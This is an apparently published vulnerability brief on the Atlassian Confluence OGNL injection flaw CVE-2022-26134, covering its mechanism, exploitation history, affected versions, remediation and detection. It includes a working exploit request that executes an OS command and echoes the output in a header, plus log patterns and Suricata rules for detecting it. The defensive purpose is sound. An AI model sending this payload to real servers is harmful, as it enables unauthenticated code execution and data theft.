CVE-2022-26134 Critical Patch Available

CVE-2022-26134: Atlassian Confluence — OGNL Injection RCE

Vuln Brief Research Team · · CVSS 9.8

CVE Details

CVE ID CVE-2022-26134
CVSS Score 9.8
Severity Critical
Vendor Atlassian
Product Confluence Server / Data Center
Patch Status Available
Published March 24, 2026

Background

Atlassian Confluence is an enterprise collaboration platform serving as the central knowledge management and documentation hub for many organisations. Confluence instances frequently contain sensitive internal documentation, architecture diagrams, credentials, meeting notes, and project data. Its ubiquity in enterprise environments and the sensitive nature of its content make it a prime target.

CVE-2022-26134 is a critical OGNL (Object-Graph Navigation Language) injection vulnerability in Confluence Server and Data Center, disclosed on June 2, 2022. It was exploited as a zero-day beginning approximately one week before Atlassian’s advisory, with Volexity detecting exploitation during an active incident response engagement. The vulnerability allows unauthenticated attackers to execute arbitrary code via the OGNL expression language that Confluence uses for template rendering and URL-based operations.

Technical Mechanism

OGNL (Object-Graph Navigation Language) is an expression language used in Java applications to navigate and manipulate object graphs. Confluence uses OGNL for various features including template processing and URL parameter evaluation.

CVE-2022-26134 is in Confluence’s URL processing layer. Confluence’s routing configuration uses OGNL expressions in certain URL patterns. The vulnerability allows OGNL expressions to be injected through the HTTP request URI and evaluated server-side without authentication:

# Base exploit pattern
GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28new+String%5B%5D%7B%22id%22%7D%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1

# Decoded OGNL expression:
${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(new String[]{"id"}).getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}

The exploit works by:

  1. Injecting an OGNL expression in the URL path (URL-encoded)
  2. Confluence’s URL router evaluates the path and processes OGNL expressions
  3. The expression calls Runtime.getRuntime().exec() to execute OS commands
  4. Output is returned via a custom HTTP response header

The Java expression provides access to the full Java runtime, allowing execution of arbitrary commands in the context of the Confluence application server (typically Apache Tomcat), running as the Confluence service account.

This vulnerability is similar to CVE-2021-26084 (another Confluence OGNL injection) and is part of a pattern of OGNL injection vulnerabilities in Java applications that use expression languages for template processing.

Real-World Exploitation Evidence

Volexity detected active exploitation during an incident response engagement on June 2, 2022 — the same day Atlassian published its advisory. The timeline indicates exploitation was already occurring before or simultaneously with disclosure:

  • Immediate mass exploitation: Within 24 hours of the advisory, multiple security firms reported widespread exploitation attempts against internet-facing Confluence instances.
  • Web shell deployment: The most common immediate post-exploitation action was deploying web shells (.jsp files in the Confluence web root) for persistent access.
  • Chopper web shell: A China Chopper web shell variant was frequently deployed, consistent with Chinese threat actor tradecraft.
  • PoC proliferation: Multiple working PoC exploits were published within hours of the advisory, lowering the technical barrier for exploitation.
  • Cryptocurrency miner deployment: Beyond advanced threat actors, opportunistic actors deployed Monero cryptocurrency miners on compromised servers.
  • Ransomware staging: Evidence of Confluence compromises used as initial access for later ransomware deployment.

CISA issued an urgent advisory recommending blocking internet access to Confluence as an immediate mitigation.

Impact Assessment

Unauthenticated RCE on Confluence provides:

  • Code execution in application context: Java process execution with Confluence service account permissions.
  • Complete Confluence content access: All Confluence spaces, pages, attachments, and macro content — including credentials that users have stored in Confluence pages (a common but insecure practice).
  • Database access: Confluence’s database connection credentials are in the application’s configuration; RCE provides access to the underlying Confluence database.
  • Internal network pivot: Confluence servers typically have connectivity to other internal systems; the compromised server serves as a pivot point.
  • Plugin-based escalation: Confluence plugins execute Java code in the application’s JVM; installing a malicious plugin via the compromised admin access provides persistent elevated RCE.

Affected Versions

ProductAffected VersionsFixed Version
Confluence Server1.3.0 – 7.18.07.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, 7.18.1
Confluence Data Center1.3.0 – 7.18.0Same as above
Confluence CloudNot affectedN/A

Remediation Steps

  1. Apply patches immediately: Update to a fixed version. Multiple fix versions were released to cover different supported branches.

  2. Emergency mitigation — restrict internet access: CISA recommended immediately restricting internet access to Confluence as an interim measure:

    • Block all inbound HTTP/HTTPS to Confluence from untrusted networks
    • Place behind VPN or require VPN for access

  3. Check for web shell compromise: Scan for unexpected JSP files:

    find <confluence-install>/confluence/ -name "*.jsp" -newer <confluence-install>/confluence/WEB-INF/web.xml

  4. Review Confluence logs: Check atlassian-confluence.log for OGNL expressions in URL paths (look for %24%7B or ${ in access logs).

  5. Post-patch user audit: Review all Confluence user accounts and administrator accounts for unexpected additions.

Detection Guidance

Log sources:

  • Confluence access log: <confluence-install>/logs/localhost_access_log.*.txt
  • Confluence application log: <confluence-home>/logs/atlassian-confluence.log

Detection pattern in access logs:

# URL-encoded OGNL injection
%24%7B in URL path
%40java.lang.Runtime
%40org.apache.commons

# Decoded OGNL patterns
${@java.lang.Runtime
${(#

Suricata signatures:

alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"Atlassian Confluence CVE-2022-26134 OGNL Injection"; flow:established,to_server; http.uri; content:"%24%7B"; http.uri; content:"java.lang.Runtime"; nocase; sid:9002261; rev:1;)

alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"Atlassian Confluence CVE-2022-26134 OGNL Injection v2"; flow:established,to_server; http.uri; pcre:"/%24%7B.*exec\(/i"; sid:9002262; rev:1;)

Timeline

DateEvent
May 25, 2022Earliest known exploitation (Volexity)
June 2, 2022Atlassian publishes advisory; patches released
June 2, 2022CISA adds CVE-2022-26134 to KEV catalogue
June 3, 2022CISA issues urgent advisory recommending immediate mitigation
June 3, 2022Multiple PoC exploits published publicly
June 2022Mass exploitation wave; web shell deployments across thousands of instances

Tags

atlassianconfluenceognl-injectionrcewikizero-daycisa-kev

Related Analysis

CVE-2024-1708 Critical

CVE-2024-1708: ConnectWise ScreenConnect Path Traversal — RMM Tools as Attack Vectors

ConnectWise

CVE-2026-0300 Critical

CVE-2026-0300: Palo Alto PAN-OS Out-of-Bounds Write Leads to Root RCE on Firewalls

Palo Alto Networks

CVE-2026-20182 Critical

CVE-2026-20182: Cisco Catalyst SD-WAN Authentication Bypass — Unauthenticated Admin Access

Cisco